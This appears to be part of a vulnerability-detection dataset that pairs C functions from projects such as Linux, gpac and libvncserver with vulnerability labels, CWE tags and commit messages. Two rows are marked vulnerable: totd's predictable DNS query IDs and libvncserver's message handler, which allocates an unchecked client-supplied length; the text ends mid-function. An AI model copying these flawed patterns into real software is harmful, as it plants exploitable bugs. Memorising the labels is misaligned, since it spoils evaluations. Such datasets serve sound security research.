func (string, lengths 0-484k) | target (int64, 0-1) | cwe (list, lengths 0-4) | project (string, 799 classes) | commit_id (string, length 40) | hash (float64) | size (int64, 1-24k) | message (string, lengths 0-13.3k)
---|---|---|---|---|---|---|---
static __init int vmx_disabled_by_bios(void)
{
return !boot_cpu_has(X86_FEATURE_MSR_IA32_FEAT_CTL) ||
!boot_cpu_has(X86_FEATURE_VMX);
}
| 0 |
[
"CWE-787"
] |
linux
|
04c4f2ee3f68c9a4bf1653d15f1a9a435ae33f7a
| 80,413,216,101,823,000,000,000,000,000,000,000,000 | 5 |
KVM: VMX: Don't use vcpu->run->internal.ndata as an array index
__vmx_handle_exit() uses vcpu->run->internal.ndata as an index for
an array access. Since vcpu->run is (or can be) mapped into a user address
space with write permission, 'ndata' could be updated by the
user process at any time (the user process can set it to a value outside
the bounds of the array).
So it is not safe for __vmx_handle_exit() to use 'ndata' that way.
Fixes: 1aa561b1a4c0 ("kvm: x86: Add "last CPU" to some KVM_EXIT information")
Signed-off-by: Reiji Watanabe <[email protected]>
Reviewed-by: Jim Mattson <[email protected]>
Message-Id: <[email protected]>
Cc: [email protected]
Signed-off-by: Paolo Bonzini <[email protected]>
|
ext4_ext_search_left(struct inode *inode, struct ext4_ext_path *path,
ext4_lblk_t *logical, ext4_fsblk_t *phys)
{
struct ext4_extent_idx *ix;
struct ext4_extent *ex;
int depth, ee_len;
BUG_ON(path == NULL);
depth = path->p_depth;
*phys = 0;
if (depth == 0 && path->p_ext == NULL)
return 0;
/* usually the extent in the path covers blocks smaller
* than *logical, but it can be that the extent is the
* first one in the file */
ex = path[depth].p_ext;
ee_len = ext4_ext_get_actual_len(ex);
if (*logical < le32_to_cpu(ex->ee_block)) {
BUG_ON(EXT_FIRST_EXTENT(path[depth].p_hdr) != ex);
while (--depth >= 0) {
ix = path[depth].p_idx;
BUG_ON(ix != EXT_FIRST_INDEX(path[depth].p_hdr));
}
return 0;
}
BUG_ON(*logical < (le32_to_cpu(ex->ee_block) + ee_len));
*logical = le32_to_cpu(ex->ee_block) + ee_len - 1;
*phys = ext_pblock(ex) + ee_len - 1;
return 0;
}
| 0 |
[
"CWE-703"
] |
linux
|
744692dc059845b2a3022119871846e74d4f6e11
| 116,605,259,511,672,840,000,000,000,000,000,000,000 | 35 |
ext4: use ext4_get_block_write in buffer write
Allocate uninitialized extent before ext4 buffer write and
convert the extent to initialized after io completes.
The purpose is to make sure an extent can only be marked
initialized after it has been written with new data so
we can safely drop the i_mutex lock in ext4 DIO read without
exposing stale data. This helps to improve multi-thread DIO
read performance on high-speed disks.
Skip the nobh and data=journal mount cases to make things simple for now.
Signed-off-by: Jiaying Zhang <[email protected]>
Signed-off-by: "Theodore Ts'o" <[email protected]>
|
TEST(UriSuite, TestUriUserInfoHostPort23Bug3510198RelatedOne) {
// Empty user info
UriParserStateA stateA;
UriUriA uriA;
stateA.uri = &uriA;
int res;
// 0 4 0 3 01 0 4 01
res = uriParseUriA(&stateA, "http" "://" "@" "host" "/");
ASSERT_TRUE(URI_SUCCESS == res);
ASSERT_TRUE(uriA.userInfo.afterLast != NULL);
ASSERT_TRUE(uriA.userInfo.first != NULL);
ASSERT_TRUE(uriA.userInfo.afterLast - uriA.userInfo.first == 0);
ASSERT_TRUE(!memcmp(uriA.hostText.first, "host", 4 * sizeof(char)));
ASSERT_TRUE(uriA.hostText.afterLast - uriA.hostText.first == 4);
ASSERT_TRUE(uriA.portText.first == NULL);
ASSERT_TRUE(uriA.portText.afterLast == NULL);
uriFreeUriMembersA(&uriA);
}
| 0 |
[
"CWE-125"
] |
uriparser
|
cef25028de5ff872c2e1f0a6c562eb3ea9ecbce4
| 245,829,355,703,906,000,000,000,000,000,000,000,000 | 19 |
Fix uriParse*Ex* out-of-bounds read
|
static void stub_timer(unsigned long data)
{
WARN_ON(1);
}
| 0 |
[
"CWE-200"
] |
tip
|
dfb4357da6ddbdf57d583ba64361c9d792b0e0b1
| 187,583,036,716,534,130,000,000,000,000,000,000,000 | 4 |
time: Remove CONFIG_TIMER_STATS
Currently CONFIG_TIMER_STATS exposes process information across namespaces:
kernel/time/timer_list.c print_timer():
SEQ_printf(m, ", %s/%d", tmp, timer->start_pid);
/proc/timer_list:
#11: <0000000000000000>, hrtimer_wakeup, S:01, do_nanosleep, cron/2570
Given that the tracer can give the same information, this patch entirely
removes CONFIG_TIMER_STATS.
Suggested-by: Thomas Gleixner <[email protected]>
Signed-off-by: Kees Cook <[email protected]>
Acked-by: John Stultz <[email protected]>
Cc: Nicolas Pitre <[email protected]>
Cc: [email protected]
Cc: Lai Jiangshan <[email protected]>
Cc: Shuah Khan <[email protected]>
Cc: Xing Gao <[email protected]>
Cc: Jonathan Corbet <[email protected]>
Cc: Jessica Frazelle <[email protected]>
Cc: [email protected]
Cc: Nicolas Iooss <[email protected]>
Cc: "Paul E. McKenney" <[email protected]>
Cc: Petr Mladek <[email protected]>
Cc: Richard Cochran <[email protected]>
Cc: Tejun Heo <[email protected]>
Cc: Michal Marek <[email protected]>
Cc: Josh Poimboeuf <[email protected]>
Cc: Dmitry Vyukov <[email protected]>
Cc: Oleg Nesterov <[email protected]>
Cc: "Eric W. Biederman" <[email protected]>
Cc: Olof Johansson <[email protected]>
Cc: Andrew Morton <[email protected]>
Cc: [email protected]
Cc: Arjan van de Ven <[email protected]>
Link: http://lkml.kernel.org/r/20170208192659.GA32582@beast
Signed-off-by: Thomas Gleixner <[email protected]>
|
u32 gf_isom_get_sync_point_count(GF_ISOFile *the_file, u32 trackNumber)
{
GF_TrackBox *trak;
trak = gf_isom_get_track_from_file(the_file, trackNumber);
if (!trak) return 0;
if (trak->Media->information->sampleTable->SyncSample) {
return trak->Media->information->sampleTable->SyncSample->nb_entries;
}
return 0;
}
| 0 |
[
"CWE-476"
] |
gpac
|
ebfa346eff05049718f7b80041093b4c5581c24e
| 545,234,232,922,466,700,000,000,000,000,000,000 | 10 |
fixed #1706
|
static int do_loopback(struct path *path, const char *old_name,
int recurse)
{
LIST_HEAD(umount_list);
struct path old_path;
struct mount *mnt = NULL, *old;
int err;
if (!old_name || !*old_name)
return -EINVAL;
err = kern_path(old_name, LOOKUP_FOLLOW|LOOKUP_AUTOMOUNT, &old_path);
if (err)
return err;
err = -EINVAL;
if (mnt_ns_loop(&old_path))
goto out;
err = lock_mount(path);
if (err)
goto out;
old = real_mount(old_path.mnt);
err = -EINVAL;
if (IS_MNT_UNBINDABLE(old))
goto out2;
if (!check_mnt(real_mount(path->mnt)) || !check_mnt(old))
goto out2;
if (recurse)
mnt = copy_tree(old, old_path.dentry, 0);
else
mnt = clone_mnt(old, old_path.dentry, 0);
if (IS_ERR(mnt)) {
err = PTR_ERR(mnt);
goto out;
}
err = graft_tree(mnt, path);
if (err) {
br_write_lock(&vfsmount_lock);
umount_tree(mnt, 0, &umount_list);
br_write_unlock(&vfsmount_lock);
}
out2:
unlock_mount(path);
release_mounts(&umount_list);
out:
path_put(&old_path);
return err;
}
| 0 |
[
"CWE-284",
"CWE-264"
] |
linux
|
3151527ee007b73a0ebd296010f1c0454a919c7d
| 199,408,790,077,146,800,000,000,000,000,000,000,000 | 53 |
userns: Don't allow creation if the user is chrooted
Guarantee that the policy of which files may be accessed, which is
established by setting the root directory, will not be violated
by user namespaces by verifying that the root directory points
to the root of the mount namespace at the time of user namespace
creation.
Changing the root is a privileged operation, and as a matter of policy
it serves to limit unprivileged processes to files below the current
root directory.
For reasons of simplicity and comprehensibility the privilege to
change the root directory is gated solely on the CAP_SYS_CHROOT
capability in the user namespace. Therefore when creating a user
namespace we must ensure that the policy of which files may be accessed
cannot be violated by changing the root directory.
Anyone who runs a process in a chroot and would like to use user
namespaces can set up the same view of filesystems with a mount
namespace instead. As a result, this is not a practical
limitation for using user namespaces.
Cc: [email protected]
Acked-by: Serge Hallyn <[email protected]>
Reported-by: Andy Lutomirski <[email protected]>
Signed-off-by: "Eric W. Biederman" <[email protected]>
|
static int selinux_socket_listen(struct socket *sock, int backlog)
{
return sock_has_perm(sock->sk, SOCKET__LISTEN);
}
| 0 |
[
"CWE-349"
] |
linux
|
fb73974172ffaaf57a7c42f35424d9aece1a5af6
| 7,134,701,723,547,158,000,000,000,000,000,000,000 | 4 |
selinux: properly handle multiple messages in selinux_netlink_send()
Fix the SELinux netlink_send hook to properly handle multiple netlink
messages in a single sk_buff; each message is parsed and subject to
SELinux access control. Prior to this patch, SELinux only inspected
the first message in the sk_buff.
Cc: [email protected]
Reported-by: Dmitry Vyukov <[email protected]>
Reviewed-by: Stephen Smalley <[email protected]>
Signed-off-by: Paul Moore <[email protected]>
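As a hedged illustration of the underlying iteration pattern (a userspace-style sketch using the standard <linux/netlink.h> macros, not SELinux's internal hook), every message in the buffer must be visited, not just the first:

```c
#include <sys/socket.h>
#include <linux/netlink.h>

/* Walk every netlink message in a buffer. NLMSG_OK validates that the
 * claimed nlmsg_len fits in the remaining bytes, and NLMSG_NEXT
 * advances the cursor while shrinking `len`. */
static void handle_all_messages(void *buf, int len,
                                void (*check)(struct nlmsghdr *))
{
    struct nlmsghdr *nlh;

    for (nlh = (struct nlmsghdr *)buf; NLMSG_OK(nlh, len);
         nlh = NLMSG_NEXT(nlh, len)) {
        check(nlh);  /* apply the permission check to EVERY message */
        if (nlh->nlmsg_type == NLMSG_DONE)
            break;
    }
}
```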
|
GF_Box *npck_box_new()
{
ISOM_DECL_BOX_ALLOC(GF_NPCKBox, GF_ISOM_BOX_TYPE_NPCK);
return (GF_Box *)tmp;
}
| 0 |
[
"CWE-787"
] |
gpac
|
388ecce75d05e11fc8496aa4857b91245007d26e
| 28,377,885,427,206,597,000,000,000,000,000,000,000 | 5 |
fixed #1587
|
int mesg_make_query (u_char *qname, uint16_t qtype, uint16_t qclass,
uint32_t id, int rd, u_char *buf, int buflen) {
char *fn = "mesg_make_query()";
u_char *ucp;
int i, written_len;
Mesg_Hdr *hdr;
if (T.debug > 4)
syslog (LOG_DEBUG, "%s: (qtype: %s, id: %d): start", fn,
string_rtype (qtype), id);
hdr = (Mesg_Hdr *) buf;
/* write header */
hdr->id = id;
hdr->opcode = OP_QUERY;
hdr->rcode = RC_OK;
hdr->rd = rd;
hdr->qr = hdr->aa = hdr->tc = hdr->ra = hdr->zero = 0;
hdr->qdcnt = ntohs (1);
hdr->ancnt = hdr->nscnt = hdr->arcnt = ntohs (0);
written_len = sizeof (Mesg_Hdr);
ucp = (u_char *) (hdr + 1);
/* write qname */
if (T.debug > 4)
syslog (LOG_DEBUG, "%s: qname offset = %zd", fn, ucp - buf);
i = dname_copy (qname, ucp, buflen - written_len);
if (i < 0)
return -1;
written_len += i;
ucp += i;
/* write qtype / qclass */
if (T.debug > 4)
syslog (LOG_DEBUG, "%s: qtype/qclass offset = %zd",
fn, ucp - buf);
written_len += sizeof (uint16_t) * 2;
if (written_len > buflen)
return -1;
PUTSHORT (qtype, ucp);
PUTSHORT (qclass, ucp);
return written_len;
}
| 1 |
[
"CWE-330"
] |
totd
|
afd8a10a6a21f82a70940d1b43cff48143250399
| 188,979,587,925,268,400,000,000,000,000,000,000,000 | 50 |
Patch provided by Gabor Lencse for generating better randomized mesg IDs.
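The patch itself is not shown in this row, but one portable way to obtain an unpredictable 16-bit DNS message ID (a sketch, not necessarily what the patch does) is to draw it from the kernel CSPRNG:

```c
#include <stdint.h>
#include <stdio.h>

/* Return 0 and store a random ID on success, -1 on failure. Predictable
 * IDs (counters, weak PRNGs) make off-path response spoofing easier. */
static int random_mesg_id(uint16_t *id)
{
    FILE *f = fopen("/dev/urandom", "rb");
    size_t n;

    if (f == NULL)
        return -1;
    n = fread(id, sizeof *id, 1, f);
    fclose(f);
    return n == 1 ? 0 : -1;
}
```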
|
rfbProcessClientNormalMessage(rfbClientPtr cl)
{
int n=0;
rfbClientToServerMsg msg;
char *str;
int i;
uint32_t enc=0;
uint32_t lastPreferredEncoding = -1;
char encBuf[64];
char encBuf2[64];
if ((n = rfbReadExact(cl, (char *)&msg, 1)) <= 0) {
if (n != 0)
rfbLogPerror("rfbProcessClientNormalMessage: read");
rfbCloseClient(cl);
return;
}
switch (msg.type) {
case rfbSetPixelFormat:
if ((n = rfbReadExact(cl, ((char *)&msg) + 1,
sz_rfbSetPixelFormatMsg - 1)) <= 0) {
if (n != 0)
rfbLogPerror("rfbProcessClientNormalMessage: read");
rfbCloseClient(cl);
return;
}
cl->format.bitsPerPixel = msg.spf.format.bitsPerPixel;
cl->format.depth = msg.spf.format.depth;
cl->format.bigEndian = (msg.spf.format.bigEndian ? TRUE : FALSE);
cl->format.trueColour = (msg.spf.format.trueColour ? TRUE : FALSE);
cl->format.redMax = Swap16IfLE(msg.spf.format.redMax);
cl->format.greenMax = Swap16IfLE(msg.spf.format.greenMax);
cl->format.blueMax = Swap16IfLE(msg.spf.format.blueMax);
cl->format.redShift = msg.spf.format.redShift;
cl->format.greenShift = msg.spf.format.greenShift;
cl->format.blueShift = msg.spf.format.blueShift;
cl->readyForSetColourMapEntries = TRUE;
cl->screen->setTranslateFunction(cl);
rfbStatRecordMessageRcvd(cl, msg.type, sz_rfbSetPixelFormatMsg, sz_rfbSetPixelFormatMsg);
return;
case rfbFixColourMapEntries:
if ((n = rfbReadExact(cl, ((char *)&msg) + 1,
sz_rfbFixColourMapEntriesMsg - 1)) <= 0) {
if (n != 0)
rfbLogPerror("rfbProcessClientNormalMessage: read");
rfbCloseClient(cl);
return;
}
rfbStatRecordMessageRcvd(cl, msg.type, sz_rfbSetPixelFormatMsg, sz_rfbSetPixelFormatMsg);
rfbLog("rfbProcessClientNormalMessage: %s",
"FixColourMapEntries unsupported\n");
rfbCloseClient(cl);
return;
/* NOTE: Some clients send us a set of encodings (ie: PointerPos) designed to enable/disable features...
* We may want to look into this...
* Example:
* case rfbEncodingXCursor:
* cl->enableCursorShapeUpdates = TRUE;
*
* Currently: cl->enableCursorShapeUpdates can *never* be turned off...
*/
case rfbSetEncodings:
{
if ((n = rfbReadExact(cl, ((char *)&msg) + 1,
sz_rfbSetEncodingsMsg - 1)) <= 0) {
if (n != 0)
rfbLogPerror("rfbProcessClientNormalMessage: read");
rfbCloseClient(cl);
return;
}
msg.se.nEncodings = Swap16IfLE(msg.se.nEncodings);
rfbStatRecordMessageRcvd(cl, msg.type, sz_rfbSetEncodingsMsg+(msg.se.nEncodings*4),sz_rfbSetEncodingsMsg+(msg.se.nEncodings*4));
/*
* UltraVNC Client has the ability to adapt to changing network environments
* So, let's give it a chance to tell us what it wants now!
*/
if (cl->preferredEncoding!=-1)
lastPreferredEncoding = cl->preferredEncoding;
/* Reset all flags to defaults (allows us to switch between PointerPos and Server Drawn Cursors) */
cl->preferredEncoding=-1;
cl->useCopyRect = FALSE;
cl->useNewFBSize = FALSE;
cl->cursorWasChanged = FALSE;
cl->useRichCursorEncoding = FALSE;
cl->enableCursorPosUpdates = FALSE;
cl->enableCursorShapeUpdates = FALSE;
cl->enableLastRectEncoding = FALSE;
cl->enableKeyboardLedState = FALSE;
cl->enableSupportedMessages = FALSE;
cl->enableSupportedEncodings = FALSE;
cl->enableServerIdentity = FALSE;
for (i = 0; i < msg.se.nEncodings; i++) {
if ((n = rfbReadExact(cl, (char *)&enc, 4)) <= 0) {
if (n != 0)
rfbLogPerror("rfbProcessClientNormalMessage: read");
rfbCloseClient(cl);
return;
}
enc = Swap32IfLE(enc);
switch (enc) {
case rfbEncodingCopyRect:
cl->useCopyRect = TRUE;
break;
case rfbEncodingRaw:
case rfbEncodingRRE:
case rfbEncodingCoRRE:
case rfbEncodingHextile:
case rfbEncodingUltra:
#ifdef LIBVNCSERVER_HAVE_LIBZ
case rfbEncodingZlib:
case rfbEncodingZRLE:
case rfbEncodingZYWRLE:
#ifdef LIBVNCSERVER_HAVE_LIBJPEG
case rfbEncodingTight:
#endif
#endif
/* The first supported encoding is the 'preferred' encoding */
if (cl->preferredEncoding == -1)
cl->preferredEncoding = enc;
break;
case rfbEncodingXCursor:
if(!cl->screen->dontConvertRichCursorToXCursor) {
rfbLog("Enabling X-style cursor updates for client %s\n",
cl->host);
/* if cursor was drawn, hide the cursor */
if(!cl->enableCursorShapeUpdates)
rfbRedrawAfterHideCursor(cl,NULL);
cl->enableCursorShapeUpdates = TRUE;
cl->cursorWasChanged = TRUE;
}
break;
case rfbEncodingRichCursor:
rfbLog("Enabling full-color cursor updates for client %s\n",
cl->host);
/* if cursor was drawn, hide the cursor */
if(!cl->enableCursorShapeUpdates)
rfbRedrawAfterHideCursor(cl,NULL);
cl->enableCursorShapeUpdates = TRUE;
cl->useRichCursorEncoding = TRUE;
cl->cursorWasChanged = TRUE;
break;
case rfbEncodingPointerPos:
if (!cl->enableCursorPosUpdates) {
rfbLog("Enabling cursor position updates for client %s\n",
cl->host);
cl->enableCursorPosUpdates = TRUE;
cl->cursorWasMoved = TRUE;
}
break;
case rfbEncodingLastRect:
if (!cl->enableLastRectEncoding) {
rfbLog("Enabling LastRect protocol extension for client "
"%s\n", cl->host);
cl->enableLastRectEncoding = TRUE;
}
break;
case rfbEncodingNewFBSize:
if (!cl->useNewFBSize) {
rfbLog("Enabling NewFBSize protocol extension for client "
"%s\n", cl->host);
cl->useNewFBSize = TRUE;
}
break;
case rfbEncodingKeyboardLedState:
if (!cl->enableKeyboardLedState) {
rfbLog("Enabling KeyboardLedState protocol extension for client "
"%s\n", cl->host);
cl->enableKeyboardLedState = TRUE;
}
break;
case rfbEncodingSupportedMessages:
if (!cl->enableSupportedMessages) {
rfbLog("Enabling SupportedMessages protocol extension for client "
"%s\n", cl->host);
cl->enableSupportedMessages = TRUE;
}
break;
case rfbEncodingSupportedEncodings:
if (!cl->enableSupportedEncodings) {
rfbLog("Enabling SupportedEncodings protocol extension for client "
"%s\n", cl->host);
cl->enableSupportedEncodings = TRUE;
}
break;
case rfbEncodingServerIdentity:
if (!cl->enableServerIdentity) {
rfbLog("Enabling ServerIdentity protocol extension for client "
"%s\n", cl->host);
cl->enableServerIdentity = TRUE;
}
break;
default:
#ifdef LIBVNCSERVER_HAVE_LIBZ
if ( enc >= (uint32_t)rfbEncodingCompressLevel0 &&
enc <= (uint32_t)rfbEncodingCompressLevel9 ) {
cl->zlibCompressLevel = enc & 0x0F;
#ifdef LIBVNCSERVER_HAVE_LIBJPEG
cl->tightCompressLevel = enc & 0x0F;
rfbLog("Using compression level %d for client %s\n",
cl->tightCompressLevel, cl->host);
#endif
} else if ( enc >= (uint32_t)rfbEncodingQualityLevel0 &&
enc <= (uint32_t)rfbEncodingQualityLevel9 ) {
cl->tightQualityLevel = enc & 0x0F;
rfbLog("Using image quality level %d for client %s\n",
cl->tightQualityLevel, cl->host);
} else
#endif
{
rfbExtensionData* e;
for(e = cl->extensions; e;) {
rfbExtensionData* next = e->next;
if(e->extension->enablePseudoEncoding &&
e->extension->enablePseudoEncoding(cl,
&e->data, (int)enc))
/* ext handles this encoding */
break;
e = next;
}
if(e == NULL) {
rfbBool handled = FALSE;
/* if the pseudo encoding is not handled by the
enabled extensions, search through all
extensions. */
rfbProtocolExtension* e;
for(e = rfbGetExtensionIterator(); e;) {
int* encs = e->pseudoEncodings;
while(encs && *encs!=0) {
if(*encs==(int)enc) {
void* data = NULL;
if(!e->enablePseudoEncoding(cl, &data, (int)enc)) {
rfbLog("Installed extension pretends to handle pseudo encoding 0x%x, but does not!\n",(int)enc);
} else {
rfbEnableExtension(cl, e, data);
handled = TRUE;
e = NULL;
break;
}
}
encs++;
}
if(e)
e = e->next;
}
rfbReleaseExtensionIterator();
if(!handled)
rfbLog("rfbProcessClientNormalMessage: "
"ignoring unsupported encoding type %s\n",
encodingName(enc,encBuf,sizeof(encBuf)));
}
}
}
}
if (cl->preferredEncoding == -1) {
if (lastPreferredEncoding==-1) {
cl->preferredEncoding = rfbEncodingRaw;
rfbLog("Defaulting to %s encoding for client %s\n", encodingName(cl->preferredEncoding,encBuf,sizeof(encBuf)),cl->host);
}
else {
cl->preferredEncoding = lastPreferredEncoding;
rfbLog("Sticking with %s encoding for client %s\n", encodingName(cl->preferredEncoding,encBuf,sizeof(encBuf)),cl->host);
}
}
else
{
if (lastPreferredEncoding==-1) {
rfbLog("Using %s encoding for client %s\n", encodingName(cl->preferredEncoding,encBuf,sizeof(encBuf)),cl->host);
} else {
rfbLog("Switching from %s to %s Encoding for client %s\n",
encodingName(lastPreferredEncoding,encBuf2,sizeof(encBuf2)),
encodingName(cl->preferredEncoding,encBuf,sizeof(encBuf)), cl->host);
}
}
if (cl->enableCursorPosUpdates && !cl->enableCursorShapeUpdates) {
rfbLog("Disabling cursor position updates for client %s\n",
cl->host);
cl->enableCursorPosUpdates = FALSE;
}
return;
}
case rfbFramebufferUpdateRequest:
{
sraRegionPtr tmpRegion;
if ((n = rfbReadExact(cl, ((char *)&msg) + 1,
sz_rfbFramebufferUpdateRequestMsg-1)) <= 0) {
if (n != 0)
rfbLogPerror("rfbProcessClientNormalMessage: read");
rfbCloseClient(cl);
return;
}
rfbStatRecordMessageRcvd(cl, msg.type, sz_rfbFramebufferUpdateRequestMsg,sz_rfbFramebufferUpdateRequestMsg);
/* The values come in based on the scaled screen, we need to convert them to
* values based on the main screen's coordinate system
*/
if(!rectSwapIfLEAndClip(&msg.fur.x,&msg.fur.y,&msg.fur.w,&msg.fur.h,cl))
{
rfbLog("Warning, ignoring rfbFramebufferUpdateRequest: %dXx%dY-%dWx%dH\n",msg.fur.x, msg.fur.y, msg.fur.w, msg.fur.h);
return;
}
tmpRegion =
sraRgnCreateRect(msg.fur.x,
msg.fur.y,
msg.fur.x+msg.fur.w,
msg.fur.y+msg.fur.h);
LOCK(cl->updateMutex);
sraRgnOr(cl->requestedRegion,tmpRegion);
if (!cl->readyForSetColourMapEntries) {
/* client hasn't sent a SetPixelFormat so is using server's */
cl->readyForSetColourMapEntries = TRUE;
if (!cl->format.trueColour) {
if (!rfbSetClientColourMap(cl, 0, 0)) {
sraRgnDestroy(tmpRegion);
TSIGNAL(cl->updateCond);
UNLOCK(cl->updateMutex);
return;
}
}
}
if (!msg.fur.incremental) {
sraRgnOr(cl->modifiedRegion,tmpRegion);
sraRgnSubtract(cl->copyRegion,tmpRegion);
}
TSIGNAL(cl->updateCond);
UNLOCK(cl->updateMutex);
sraRgnDestroy(tmpRegion);
return;
}
case rfbKeyEvent:
if ((n = rfbReadExact(cl, ((char *)&msg) + 1,
sz_rfbKeyEventMsg - 1)) <= 0) {
if (n != 0)
rfbLogPerror("rfbProcessClientNormalMessage: read");
rfbCloseClient(cl);
return;
}
rfbStatRecordMessageRcvd(cl, msg.type, sz_rfbKeyEventMsg, sz_rfbKeyEventMsg);
if(!cl->viewOnly) {
cl->screen->kbdAddEvent(msg.ke.down, (rfbKeySym)Swap32IfLE(msg.ke.key), cl);
}
return;
case rfbPointerEvent:
if ((n = rfbReadExact(cl, ((char *)&msg) + 1,
sz_rfbPointerEventMsg - 1)) <= 0) {
if (n != 0)
rfbLogPerror("rfbProcessClientNormalMessage: read");
rfbCloseClient(cl);
return;
}
rfbStatRecordMessageRcvd(cl, msg.type, sz_rfbPointerEventMsg, sz_rfbPointerEventMsg);
if (cl->screen->pointerClient && cl->screen->pointerClient != cl)
return;
if (msg.pe.buttonMask == 0)
cl->screen->pointerClient = NULL;
else
cl->screen->pointerClient = cl;
if(!cl->viewOnly) {
if (msg.pe.buttonMask != cl->lastPtrButtons ||
cl->screen->deferPtrUpdateTime == 0) {
cl->screen->ptrAddEvent(msg.pe.buttonMask,
ScaleX(cl->scaledScreen, cl->screen, Swap16IfLE(msg.pe.x)),
ScaleY(cl->scaledScreen, cl->screen, Swap16IfLE(msg.pe.y)),
cl);
cl->lastPtrButtons = msg.pe.buttonMask;
} else {
cl->lastPtrX = ScaleX(cl->scaledScreen, cl->screen, Swap16IfLE(msg.pe.x));
cl->lastPtrY = ScaleY(cl->scaledScreen, cl->screen, Swap16IfLE(msg.pe.y));
cl->lastPtrButtons = msg.pe.buttonMask;
}
}
return;
case rfbFileTransfer:
if ((n = rfbReadExact(cl, ((char *)&msg) + 1,
sz_rfbFileTransferMsg - 1)) <= 0) {
if (n != 0)
rfbLogPerror("rfbProcessClientNormalMessage: read");
rfbCloseClient(cl);
return;
}
msg.ft.size = Swap32IfLE(msg.ft.size);
msg.ft.length = Swap32IfLE(msg.ft.length);
/* record statistics in rfbProcessFileTransfer as length is filled with garbage when it is not valid */
rfbProcessFileTransfer(cl, msg.ft.contentType, msg.ft.contentParam, msg.ft.size, msg.ft.length);
return;
case rfbSetSW:
if ((n = rfbReadExact(cl, ((char *)&msg) + 1,
sz_rfbSetSWMsg - 1)) <= 0) {
if (n != 0)
rfbLogPerror("rfbProcessClientNormalMessage: read");
rfbCloseClient(cl);
return;
}
msg.sw.x = Swap16IfLE(msg.sw.x);
msg.sw.y = Swap16IfLE(msg.sw.y);
rfbStatRecordMessageRcvd(cl, msg.type, sz_rfbSetSWMsg, sz_rfbSetSWMsg);
/* msg.sw.status is not initialized in the ultraVNC viewer and contains random numbers (why???) */
rfbLog("Received a rfbSetSingleWindow(%d x, %d y)\n", msg.sw.x, msg.sw.y);
if (cl->screen->setSingleWindow!=NULL)
cl->screen->setSingleWindow(cl, msg.sw.x, msg.sw.y);
return;
case rfbSetServerInput:
if ((n = rfbReadExact(cl, ((char *)&msg) + 1,
sz_rfbSetServerInputMsg - 1)) <= 0) {
if (n != 0)
rfbLogPerror("rfbProcessClientNormalMessage: read");
rfbCloseClient(cl);
return;
}
rfbStatRecordMessageRcvd(cl, msg.type, sz_rfbSetServerInputMsg, sz_rfbSetServerInputMsg);
/* msg.sim.pad is not initialized in the ultraVNC viewer and contains random numbers (why???) */
/* msg.sim.pad = Swap16IfLE(msg.sim.pad); */
rfbLog("Received a rfbSetServerInput(%d status)\n", msg.sim.status);
if (cl->screen->setServerInput!=NULL)
cl->screen->setServerInput(cl, msg.sim.status);
return;
case rfbTextChat:
if ((n = rfbReadExact(cl, ((char *)&msg) + 1,
sz_rfbTextChatMsg - 1)) <= 0) {
if (n != 0)
rfbLogPerror("rfbProcessClientNormalMessage: read");
rfbCloseClient(cl);
return;
}
msg.tc.pad2 = Swap16IfLE(msg.tc.pad2);
msg.tc.length = Swap32IfLE(msg.tc.length);
switch (msg.tc.length) {
case rfbTextChatOpen:
case rfbTextChatClose:
case rfbTextChatFinished:
/* commands do not have text following */
/* Why couldn't they have used the pad byte??? */
str=NULL;
rfbStatRecordMessageRcvd(cl, msg.type, sz_rfbTextChatMsg, sz_rfbTextChatMsg);
break;
default:
if ((msg.tc.length>0) && (msg.tc.length<rfbTextMaxSize))
{
str = (char *)malloc(msg.tc.length);
if (str==NULL)
{
rfbLog("Unable to malloc %d bytes for a TextChat Message\n", msg.tc.length);
rfbCloseClient(cl);
return;
}
if ((n = rfbReadExact(cl, str, msg.tc.length)) <= 0) {
if (n != 0)
rfbLogPerror("rfbProcessClientNormalMessage: read");
free(str);
rfbCloseClient(cl);
return;
}
rfbStatRecordMessageRcvd(cl, msg.type, sz_rfbTextChatMsg+msg.tc.length, sz_rfbTextChatMsg+msg.tc.length);
}
else
{
/* This should never happen */
rfbLog("client sent us a Text Message that is too big %d>%d\n", msg.tc.length, rfbTextMaxSize);
rfbCloseClient(cl);
return;
}
}
/* Note: length can be commands: rfbTextChatOpen, rfbTextChatClose, and rfbTextChatFinished
* at which point, the str is NULL (as it is not sent)
*/
if (cl->screen->setTextChat!=NULL)
cl->screen->setTextChat(cl, msg.tc.length, str);
free(str);
return;
case rfbClientCutText:
if ((n = rfbReadExact(cl, ((char *)&msg) + 1,
sz_rfbClientCutTextMsg - 1)) <= 0) {
if (n != 0)
rfbLogPerror("rfbProcessClientNormalMessage: read");
rfbCloseClient(cl);
return;
}
msg.cct.length = Swap32IfLE(msg.cct.length);
str = (char *)malloc(msg.cct.length);
if ((n = rfbReadExact(cl, str, msg.cct.length)) <= 0) {
if (n != 0)
rfbLogPerror("rfbProcessClientNormalMessage: read");
free(str);
rfbCloseClient(cl);
return;
}
rfbStatRecordMessageRcvd(cl, msg.type, sz_rfbClientCutTextMsg+msg.cct.length, sz_rfbClientCutTextMsg+msg.cct.length);
if(!cl->viewOnly) {
cl->screen->setXCutText(str, msg.cct.length, cl);
}
free(str);
return;
case rfbPalmVNCSetScaleFactor:
cl->PalmVNC = TRUE;
if ((n = rfbReadExact(cl, ((char *)&msg) + 1,
sz_rfbSetScaleMsg - 1)) <= 0) {
if (n != 0)
rfbLogPerror("rfbProcessClientNormalMessage: read");
rfbCloseClient(cl);
return;
}
rfbStatRecordMessageRcvd(cl, msg.type, sz_rfbSetScaleMsg, sz_rfbSetScaleMsg);
rfbLog("rfbSetScale(%d)\n", msg.ssc.scale);
rfbScalingSetup(cl,cl->screen->width/msg.ssc.scale, cl->screen->height/msg.ssc.scale);
rfbSendNewScaleSize(cl);
return;
case rfbSetScale:
if ((n = rfbReadExact(cl, ((char *)&msg) + 1,
sz_rfbSetScaleMsg - 1)) <= 0) {
if (n != 0)
rfbLogPerror("rfbProcessClientNormalMessage: read");
rfbCloseClient(cl);
return;
}
rfbStatRecordMessageRcvd(cl, msg.type, sz_rfbSetScaleMsg, sz_rfbSetScaleMsg);
rfbLog("rfbSetScale(%d)\n", msg.ssc.scale);
rfbScalingSetup(cl,cl->screen->width/msg.ssc.scale, cl->screen->height/msg.ssc.scale);
rfbSendNewScaleSize(cl);
return;
default:
{
rfbExtensionData *e,*next;
for(e=cl->extensions; e;) {
next = e->next;
if(e->extension->handleMessage &&
e->extension->handleMessage(cl, e->data, &msg))
{
rfbStatRecordMessageRcvd(cl, msg.type, 0, 0); /* Extension should handle this */
return;
}
e = next;
}
rfbLog("rfbProcessClientNormalMessage: unknown message type %d\n",
msg.type);
